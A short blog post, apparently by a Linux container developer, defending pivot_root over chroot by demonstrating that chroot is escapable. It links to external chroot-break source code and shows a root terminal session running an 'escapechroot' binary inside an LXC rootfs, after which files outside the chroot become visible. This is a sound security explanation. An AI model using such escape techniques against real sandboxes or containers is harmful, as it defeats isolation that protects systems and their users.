Sigh. It seems I’m (*1) being called out (*2) for advocating the use of pivot_root over chroot for containers.
Now first off, containers aren’t secure anyway, so this is all kind of moot. If the use of pivot_root over chroot is causing actual problems, we should reconsider. But I couldn’t find any mention of such problems in the post in question.
Nevertheless, chroot *is* escapable. It has nothing to do with ‘your / link not getting updated’. It has to do with the actual (dentry,vfsmount) in kernel-space. I’ll say no more and leave understanding the rest as an exercise for the reader. Of course, before bothering to look, you will want to convince yourself. So grab the source from http://www.bpfh.net/simes/computing/chroot-break.html. Set up another rootfs. I had one handy from a container, so I used /var/lib/lxc/natty/rootfs. I copied my executable, called escapechroot, to /var/lib/lxc/natty/rootfs/root. Then I did
root@peqn:/#cd /var/lib/lxc/natty/rootfs root@peqn:/#chroot . root@peqn:/#cd . root@peqn:/# ls /var/lib/lxc/natty ls: cannot access /var/lib/lxc/natty: No such file or directory root@peqn:/# /root/escapechroot # ls /var/lib/lxc/natty config fstab rootfs
All right, so it *is* escapable. Now go read the kernel code.
(*1) Rudely, with no private communication or chance to show I’m right or admit I’m wrong.
(*2) And being called an author of LXC, which I am not.